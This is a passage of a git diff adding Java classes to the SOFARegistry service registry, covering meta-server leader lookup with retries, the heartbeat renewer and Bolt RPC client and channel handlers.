Mar 15, 2021 + */ +public abstract class AbstractMetaServerManager extends ClientSideExchanger + implements MetaServerManager { + + private static final Logger LOGGER = LoggerFactory.getLogger(AbstractMetaServerManager.class); + + @Resource(name = "metaClientHandlers") + private Collection metaClientHandlers; + + protected volatile LeaderInfo metaLeaderInfo; + + protected static final String META_LEADER_QUERY_URL = "http://%s:9615/meta/leader/query"; + + static final String LEADER_KEY = "leader"; + static final String EPOCH_KEY = "epoch"; + + private final Retryer retryer = + RetryerBuilder.newBuilder() + .retryIfException() + .retryIfResult( + new Predicate() { + @Override + public boolean apply(LeaderInfo input) { + return input == null; + } + }) + .withWaitStrategy(WaitStrategies.exponentialWait(1000, 3000, TimeUnit.MILLISECONDS)) + .withStopStrategy(StopStrategies.stopAfterAttempt(5)) + .build(); + + private javax.ws.rs.client.Client rsClient; + + protected AbstractMetaServerManager() { + super(Exchange.META_SERVER_TYPE); + } + + @PostConstruct + public void init() { + super.init(); + rsClient = JerseyClient.getInstance().getClient(); + resetLeaderFromRestServer(); + } + + @Override + public String getMetaServerLeader() { + if (metaLeaderInfo == null) { + resetLeaderFromRestServer(); + } + return metaLeaderInfo.getLeader(); + } + + @Override + public void refresh(BaseHeartBeatResponse heartBeatResp) { + String futureLeader = heartBeatResp.getMetaLeader(); + long futureEpoch = heartBeatResp.getMetaLeaderEpoch(); + if (StringUtils.isBlank(futureLeader)) { + LOGGER.warn("heartbeat response not contains leader"); + return; + } + // set leader + setLeader(new LeaderInfo(futureEpoch, futureLeader)); + } + + @Override + public Response sendRequest(Object requestBody) throws RequestException { + Request request = + new Request() { + @Override + public Object getRequestBody() { + return requestBody; + } + + @Override + public URL getRequestUrl() { + return new URL(getMetaServerLeader(), getServerPort()); + } + }; + return request(request); + } + + @Override + public Response request(Request request) throws RequestException { + LOGGER.info( + "[request] MetaNode Exchanger request={},url={},callbackHandler={}", + request.getRequestBody(), + request.getRequestUrl(), + request.getCallBackHandler()); + try { + return super.request(request); + } catch (Throwable e) { + // retry + resetLeaderFromRestServer(); + URL url = new URL(getMetaServerLeader(), getServerPort()); + LOGGER.warn( + "[request] MetaNode Exchanger request send error!It will be retry once!Request url:{}", + url); + return super.request(request); + } + } + + @Override + protected Collection getClientHandlers() { + return metaClientHandlers; + } + + private void setLeader(LeaderInfo leader) { + if (trySetLeader(leader)) { + LOGGER.info("update leader {}", leader); + } + } + + private boolean trySetLeader(LeaderInfo leader) { + synchronized (this) { + if (metaLeaderInfo == null || metaLeaderInfo.getEpoch() < leader.getEpoch()) { + this.metaLeaderInfo = leader; + // do not need to refresh the connect, the daemon connector will to this + // TODO now not close the conn which is not leader, the num of conn is small + this.setServerIps(Collections.singleton(leader.getLeader())); + return true; + } + return false; + } + } + + @Override + public LeaderInfo resetLeaderFromRestServer() { + LeaderInfo leaderInfo = null; + Collection metaDomains = getConfiguredMetaServerDomains(); + try { + leaderInfo = retryer.call(() -> queryLeaderInfo(metaDomains, rsClient)); + } catch (Throwable e) { + throw new MetaLeaderQueryException("query meta leader error from " + metaDomains, e); + } + // connect to meta leader + connect(new URL(leaderInfo.getLeader(), getServerPort())); + setLeader(leaderInfo); + return this.metaLeaderInfo; + } + + protected abstract Collection getConfiguredMetaServerDomains(); + + static LeaderInfo queryLeaderInfo( + Collection metaDomains, javax.ws.rs.client.Client client) { + for (String metaDomain : metaDomains) { + String url = String.format(META_LEADER_QUERY_URL, metaDomain); + try { + javax.ws.rs.core.Response resp = client.target(url).request().buildGet().invoke(); + if (resp.getStatus() != javax.ws.rs.core.Response.Status.OK.getStatusCode()) { + LOGGER.error( + "[resetLeaderFromRestServer] failed to query from url: {}, resp status: {}", + url, + resp.getStatus()); + continue; + } + GenericResponse genericResponse = new GenericResponse<>(); + genericResponse = resp.readEntity(genericResponse.getClass()); + + if (!genericResponse.isSuccess() || genericResponse.getData() == null) { + LOGGER.error( + "[resetLeaderFromRestServer] failed to query from url: {}, resp: {}", + url, + JsonUtils.writeValueAsString(genericResponse)); + continue; + } + Map data = (Map) genericResponse.getData(); + Long epoch = (Long) data.get(EPOCH_KEY); + String leader = (String) data.get(LEADER_KEY); + if (StringUtils.isBlank(leader)) { + continue; + } + LeaderInfo query = new LeaderInfo(epoch, leader); + if (LOGGER.isInfoEnabled()) { + LOGGER.info("[resetLeaderFromRestServer] query from url: {}, meta leader:{}", url, query); + } + return query; + } catch (Throwable e) { + LOGGER.error("[resetLeaderFromRestServer] failed to query from url: {}", url, e); + continue; + } + } + return null; + } + + @VisibleForTesting + void setRsClient(Client rsClient) { + this.rsClient = rsClient; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerService.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerService.java new file mode 100644 index 000000000..93e7ed752 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/AbstractMetaServerService.java @@ -0,0 +1,321 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.common.model.metaserver.DataOperation; +import com.alipay.sofa.registry.common.model.metaserver.FetchProvideDataRequest; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import com.alipay.sofa.registry.common.model.metaserver.blacklist.RegistryForbiddenServerRequest; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.concurrent.atomic.AtomicInteger; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-28 15:21 yuzhi.lyz Exp $ + */ +public abstract class AbstractMetaServerService + implements MetaServerService { + protected final Logger LOGGER = LoggerFactory.getLogger(getClass()); + protected final Logger RENEW_ERROR_LOG = LoggerFactory.getLogger("RENEW-ERROR"); + + @Autowired protected MetaServerManager metaServerManager; + + protected volatile State state = State.NULL; + + final Renewer renewer = new Renewer(); + + final AtomicInteger renewFailCounter = new AtomicInteger(0); + static final int MAX_RENEW_FAIL_COUNT = 3; + + @Override + public synchronized void startRenewer() { + ConcurrentUtils.createDaemonThread("meta-renewer", this.renewer).start(); + } + + @Override + public void suspendRenewer() { + renewer.suspend(); + LOGGER.info("suspend the renewer"); + } + + @Override + public void resumeRenewer() { + renewer.resume(); + LOGGER.info("resume the renewer"); + } + + public abstract int getRenewIntervalSecs(); + + @Override + public boolean handleSlotTableChange(SlotTableChangeEvent event) { + long epoch = event.getSlotTableEpoch(); + long currentEpoch = getCurrentSlotTableEpoch(); + if (currentEpoch >= epoch) { + LOGGER.warn( + "[handleSlotTableChange] slot-table change event epoch: [{}], current epoch: [{}], " + + "won't retrieve again", + epoch, + currentEpoch); + return false; + } + LOGGER.info( + "[handleSlotTableChange] slot table is changed, run heart-beat to retrieve new version"); + renewer.wakeup(); + return true; + } + + @Override + public void addSelfToMetaBlacklist() { + metaServerManager.sendRequest( + new RegistryForbiddenServerRequest(DataOperation.ADD, ServerEnv.IP)); + } + + @Override + public void removeSelfFromMetaBlacklist() { + metaServerManager.sendRequest( + new RegistryForbiddenServerRequest(DataOperation.REMOVE, ServerEnv.IP)); + } + + private final class Renewer extends WakeUpLoopRunnable { + @Override + public void runUnthrowable() { + try { + checkRenewFailCounter(); + renewNode(); + } catch (Throwable e) { + LOGGER.error("failed to renewNode", e); + } + } + + @Override + public int getWaitingMillis() { + return getRenewIntervalSecs() * 1000; + } + } + + @Override + public void renewNode() { + final String leaderIp = metaServerManager.getMetaServerLeader(); + try { + HeartbeatRequest heartbeatRequest = createRequest(); + GenericResponse resp = + (GenericResponse) metaServerManager.sendRequest(heartbeatRequest).getResult(); + handleHeartbeatResponse(resp); + } catch (Throwable e) { + handleHeartbeatFailed(leaderIp, e); + } + } + + boolean checkRenewFailCounter() { + if (renewFailCounter.get() >= MAX_RENEW_FAIL_COUNT) { + LOGGER.error( + "renewNode failed [{}] times, prepare to reset leader from rest api.", + renewFailCounter.get()); + metaServerManager.resetLeaderFromRestServer(); + renewFailCounter.set(0); + return true; + } + return false; + } + + void handleHeartbeatResponse(GenericResponse resp) { + if (resp == null) { + throw new RuntimeException("renew node to metaServer error : resp is null"); + } + if (resp.isSuccess()) { + updateState(resp.getData()); + metaServerManager.refresh(resp.getData()); + handleRenewResult(resp.getData()); + renewFailCounter.set(0); + } else { + T data = resp.getData(); + if (data == null) { + // could no get data, trigger the counter inc + throw new RuntimeException( + "renew node to metaServer error, resp.data is null, msg:" + resp.getMessage()); + } + // heartbeat on follow, refresh leader; + // it will renewNode on leader next time; + if (!data.isHeartbeatOnLeader()) { + metaServerManager.refresh(data); + // refresh the leader from follower, but the info maybe is incorrect + // throw the exception to trigger the counter inc + // if the info is correct, the counter would be reset after heartbeat + throw new RuntimeException( + "renew node to metaServer.follower, leader is " + + new LeaderInfo(data.getMetaLeaderEpoch(), data.getMetaLeader())); + } else { + throw new RuntimeException( + StringFormatter.format( + "renew node to metaServer.leader error, msg={}, data={}", resp.getMessage(), data)); + } + } + } + + void handleHeartbeatFailed(String leaderIp, Throwable e) { + renewFailCounter.incrementAndGet(); + RENEW_ERROR_LOG.error( + "[RenewNodeTask] renew node to metaServer error, fail count:{}, leader: {}", + renewFailCounter.get(), + leaderIp, + e); + throw new RuntimeException("renew node error!", e); + } + + private void updateState(T response) { + State s = + new State( + response.getDataCentersFromMetaNodes(), + response.getSessionNodesMap(), + response.getSlotTable().getDataServers(), + response.getSessionServerEpoch(), + response.getMetaLeader(), + response.getMetaLeaderEpoch()); + this.state = s; + LOGGER.info( + "update MetaStat, sessions={}/{}, datas={}, metaLeader: {}, metaLeaderEpoch: {}", + s.sessionServerEpoch, + s.sessionNodes.keySet(), + s.dataServers, + s.metaLeader, + s.metaLeaderEpoch); + } + + @Override + public ProvideData fetchData(String dataInfoId) { + final String leaderIp = metaServerManager.getMetaServerLeader(); + try { + Response response = metaServerManager.sendRequest(new FetchProvideDataRequest(dataInfoId)); + + Object result = response.getResult(); + if (result instanceof ProvideData) { + return (ProvideData) result; + } else { + LOGGER.error("fetch null provider data from {}", leaderIp); + throw new RuntimeException("metaServerService fetch null provider data!"); + } + } catch (Throwable e) { + LOGGER.error("fetch provider data error from {}", leaderIp, e); + throw new RuntimeException("fetch provider data error! " + e.getMessage(), e); + } + } + + @Override + public Set getSessionProcessIds() { + Set processIds = Sets.newHashSetWithExpectedSize(state.sessionNodes.size()); + for (SessionNode session : state.sessionNodes.values()) { + processIds.add(session.getProcessId()); + } + return processIds; + } + + public Map getSessionNodes() { + return state.sessionNodes; + } + + public Set getSessionServerList() { + return state.sessionNodes.keySet(); + } + + public Set getDataServerList() { + return state.dataServers; + } + + public String getMetaServerLeader() { + return metaServerManager.getMetaServerLeader(); + } + + public List getSessionServerList(String zonename) { + List serverList = new ArrayList<>(); + for (SessionNode sessionNode : getSessionNodes().values()) { + if (StringUtils.isBlank(zonename) || zonename.equals(sessionNode.getRegionId())) { + URL url = sessionNode.getNodeUrl(); + if (url != null) { + serverList.add(url.getIpAddress()); + } + } + } + return serverList; + } + + @Override + public long getSessionServerEpoch() { + return state.sessionServerEpoch; + } + + @Override + public Set getDataCenters() { + return state.dataCenters; + } + + protected abstract void handleRenewResult(T result); + + protected abstract HeartbeatRequest createRequest(); + + protected abstract long getCurrentSlotTableEpoch(); + + private static final class State { + static final State NULL = + new State( + Collections.emptySet(), Collections.emptyMap(), Collections.emptySet(), 0, null, -1L); + protected final long sessionServerEpoch; + protected final Map sessionNodes; + protected final Set dataServers; + protected final String metaLeader; + protected final long metaLeaderEpoch; + protected final Set dataCenters; + + State( + Set dataCenters, + Map sessionNodes, + Set dataServers, + long sessionServerEpoch, + String metaLeader, + long metaLeaderEpoch) { + this.sessionServerEpoch = sessionServerEpoch; + this.dataCenters = Collections.unmodifiableSet(new TreeSet<>(dataCenters)); + this.sessionNodes = Collections.unmodifiableMap(sessionNodes); + this.dataServers = Collections.unmodifiableSet(dataServers); + this.metaLeader = metaLeader; + this.metaLeaderEpoch = metaLeaderEpoch; + } + } + + @VisibleForTesting + public void setMetaServerManager(MetaServerManager metaServerManager) { + this.metaServerManager = metaServerManager; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManager.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManager.java new file mode 100644 index 000000000..205974d17 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerManager.java @@ -0,0 +1,37 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.elector.LeaderInfo; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Response; + +/** + * @author chen.zhu + *

Mar 15, 2021 + */ +public interface MetaServerManager { + + LeaderInfo resetLeaderFromRestServer(); + + String getMetaServerLeader(); + + void refresh(BaseHeartBeatResponse heartBeatResp); + + Response sendRequest(Object requestBody) throws RequestException; +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerService.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerService.java new file mode 100644 index 000000000..93a898d71 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/meta/MetaServerService.java @@ -0,0 +1,93 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.meta; + +import com.alipay.sofa.registry.common.model.ProcessId; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import java.util.List; +import java.util.Set; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-28 15:19 yuzhi.lyz Exp $ + */ +public interface MetaServerService { + /** Start renewer. */ + void startRenewer(); + + /** suspend renewer. */ + void suspendRenewer(); + + /** resume renewer. */ + void resumeRenewer(); + + /** update data server expireTime */ + void renewNode(); + + /** + * Handle slot table change boolean. + * + * @param event the event + * @return the boolean + */ + boolean handleSlotTableChange(SlotTableChangeEvent event); + + /** + * get provider data + * + * @param dataInfoId + * @return + */ + ProvideData fetchData(String dataInfoId); + + /** Add self to meta blacklist. */ + void addSelfToMetaBlacklist(); + + /** Remove self from meta blacklist. */ + void removeSelfFromMetaBlacklist(); + + /** + * @param zonename zone is null, get all session + * @return + */ + List getSessionServerList(String zonename); + + Set getSessionProcessIds(); + /** + * Gets get data server list. + * + * @return the get data server list + */ + Set getDataServerList(); + + String getMetaServerLeader(); + + /** + * Gets get session server epoch. + * + * @return the get session server epoch + */ + long getSessionServerEpoch(); + + /** + * get all datacenters + * + * @return + */ + Set getDataCenters(); +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractChannelHandler.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractChannelHandler.java new file mode 100644 index 000000000..b736170d6 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractChannelHandler.java @@ -0,0 +1,132 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.ChannelHandler; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-14 13:57 yuzhi.lyz Exp $ + */ +public abstract class AbstractChannelHandler implements ChannelHandler { + private final Logger connectLog; + protected final Logger exchangeLog; + + protected AbstractChannelHandler(Logger connectLog, Logger exchangeLog) { + this.connectLog = connectLog; + this.exchangeLog = exchangeLog; + } + + @Override + public void connected(Channel channel) { + connectLog.info("{} node connected, channel {}", getConnectNodeType(), channel); + } + + @Override + public void disconnected(Channel channel) { + connectLog.info("{} node disconnected, channel {}", getConnectNodeType(), channel); + } + + protected abstract Node.NodeType getConnectNodeType(); + + @Override + public void caught(Channel channel, T message, Throwable exception) { + exchangeLog.error( + "{} caughtException, channel {}, msg={}", + getConnectNodeType(), + channel, + message, + exception); + } + + @Override + public void received(Channel channel, T message) { + // only support as async + throw new UnsupportedOperationException(); + } + + @Override + public Object reply(Channel channel, T request) { + try { + logRequest(channel, request); + checkParam(request); + return doHandle(channel, request); + } catch (Throwable e) { + exchangeLog.error("[{}] handle request failed", getClassName(), e); + return buildFailedResponse(e.getMessage()); + } + } + + /** + * check params if valid + * + * @param request + */ + public void checkParam(T request) {} + + /** + * execute + * + * @param request + * @return + */ + public abstract Object doHandle(Channel channel, T request); + + /** + * build failed response + * + * @param msg + * @return + */ + public Object buildFailedResponse(String msg) { + throw new RuntimeException(msg); + } + + /** + * print request + * + * @param request + */ + protected void logRequest(Channel channel, T request) { + if (exchangeLog.isInfoEnabled()) { + StringBuilder sb = new StringBuilder(256); + sb.append("[").append(getClassName()).append("] "); + sb.append("Remote:") + .append(RemotingHelper.getChannelRemoteAddress(channel)) + .append(" Request:") + .append(request); + exchangeLog.info(sb.toString()); + } + } + + /** + * get simple name of this class + * + * @return + */ + private String getClassName() { + return this.getClass().getSimpleName(); + } + + @Override + public HandlerType getType() { + return HandlerType.PROCESSER; + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractClientHandler.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractClientHandler.java new file mode 100644 index 000000000..4da897959 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractClientHandler.java @@ -0,0 +1,34 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * @author shangyu.wh + * @version $Id: ClientHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ + */ +public abstract class AbstractClientHandler extends AbstractChannelHandler { + + private static final Logger LOGGER_EXCHANGE = LoggerFactory.getLogger("CLI-EXCHANGE"); + private static final Logger LOGGER_CONNECT = LoggerFactory.getLogger("CLI-CONNECT"); + + public AbstractClientHandler() { + super(LOGGER_CONNECT, LOGGER_EXCHANGE); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractServerHandler.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractServerHandler.java new file mode 100644 index 000000000..233ac1cca --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/AbstractServerHandler.java @@ -0,0 +1,35 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * @author shangyu.wh + * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ + */ +public abstract class AbstractServerHandler extends AbstractChannelHandler { + + private static final Logger LOGGER_CONNECT = LoggerFactory.getLogger("SRV-CONNECT"); + + private static final Logger LOGGER_EXCHANGE = LoggerFactory.getLogger("SRV-EXCHANGE"); + + public AbstractServerHandler() { + super(LOGGER_CONNECT, LOGGER_EXCHANGE); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ClientSideExchanger.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ClientSideExchanger.java new file mode 100644 index 000000000..897c85302 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ClientSideExchanger.java @@ -0,0 +1,207 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.remoting.Connection; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.Client; +import com.alipay.sofa.registry.remoting.bolt.BoltClient; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import com.google.common.collect.Sets; +import java.util.*; +import javax.annotation.PostConstruct; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-29 12:08 yuzhi.lyz Exp $ + */ +public abstract class ClientSideExchanger implements NodeExchanger { + private static final Logger LOGGER = LoggerFactory.getLogger(ClientSideExchanger.class); + protected final String serverType; + + @Autowired protected Exchange boltExchange; + + protected volatile Set serverIps = Sets.newHashSet(); + private final Connector connector; + + protected ClientSideExchanger(String serverType) { + this.serverType = serverType; + this.connector = new Connector(); + } + + @PostConstruct + public void init() { + ConcurrentUtils.createDaemonThread(serverType + "-async-connector", connector).start(); + LOGGER.info("init connector"); + } + + @Override + public Response request(Request request) throws RequestException { + final URL url = request.getRequestUrl(); + if (url == null) { + throw new RequestException("null url", request); + } + Client client = boltExchange.getClient(serverType); + final int timeout = request.getTimeout() != null ? request.getTimeout() : getRpcTimeoutMillis(); + try { + CallbackHandler callback = request.getCallBackHandler(); + if (callback == null) { + final Object result = client.sendSync(url, request.getRequestBody(), timeout); + return () -> result; + } else { + client.sendCallback(url, request.getRequestBody(), callback, timeout); + return () -> Response.ResultStatus.SUCCESSFUL; + } + } catch (Throwable e) { + throw new RequestException( + serverType + "Exchanger request error! Request url:" + url, request, e); + } + } + + public Response requestRaw(String ip, Object raw) throws RequestException { + Request req = + new Request() { + @Override + public Object getRequestBody() { + return raw; + } + + @Override + public URL getRequestUrl() { + return new URL(ip, getServerPort()); + } + }; + return request(req); + } + + @Override + public Client connectServer() { + Set ips = serverIps; + if (!ips.isEmpty()) { + int count = tryConnectAllServer(ips); + if (count == 0) { + throw new RuntimeException("failed to connect any servers, " + ips); + } + } + return getClient(); + } + + public Client getClient() { + return boltExchange.getClient(serverType); + } + + protected int tryConnectAllServer(Set ips) { + int connectCount = 0; + for (String node : ips) { + URL url = new URL(node, getServerPort()); + try { + connect(url); + connectCount++; + } catch (Throwable e) { + LOGGER.error("Exchanger connect server error!url:" + url, e); + } + } + return connectCount; + } + + public Channel connect(URL url) { + Client client = getClient(); + if (client == null) { + synchronized (this) { + client = getClient(); + if (client == null) { + client = + boltExchange.connect( + serverType, + getConnNum(), + url, + getClientHandlers().toArray(new ChannelHandler[0])); + } + } + } + Channel channel = client.getChannel(url); + if (channel == null) { + synchronized (this) { + channel = client.getChannel(url); + if (channel == null) { + channel = client.connect(url); + } + } + } + return channel; + } + + public Map> getConnections() { + Client client = boltExchange.getClient(serverType); + if (client == null) { + return Collections.emptyMap(); + } + return ((BoltClient) client).getConnections(); + } + + public void notifyConnectServerAsync() { + connector.wakeup(); + } + + private final class Connector extends WakeUpLoopRunnable { + + @Override + public void runUnthrowable() { + Set ips = serverIps; + try { + tryConnectAllServer(ips); + } catch (Throwable e) { + LOGGER.error("failded to connect {}", ips, e); + } + } + + @Override + public int getWaitingMillis() { + return 3000; + } + } + + public abstract int getRpcTimeoutMillis(); + + public abstract int getServerPort(); + + public int getConnNum() { + return 1; + } + + protected abstract Collection getClientHandlers(); + + public Set getServerIps() { + return serverIps; + } + + public synchronized void setServerIps(Collection serverIps) { + this.serverIps = Collections.unmodifiableSet(Sets.newHashSet(serverIps)); + } +} diff --git a/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandler.java b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandler.java new file mode 100644 index 000000000..1561138a8 --- /dev/null +++ b/server/server/shared/src/main/java/com/alipay/sofa/registry/server/shared/remoting/ListenServerChannelHandler.java @@ -0,0 +1,46 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.shared.remoting; + +import com.alipay.sofa.registry.remoting.Channel; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-12-14 14:42 yuzhi.lyz Exp $ + */ +public abstract class ListenServerChannelHandler extends AbstractServerHandler { + + @Override + public Object doHandle(Channel channel, Object request) { + throw new UnsupportedOperationException(); + } + + @Override + public Object buildFailedResponse(String msg) { + throw new RuntimeException(msg); + } + + 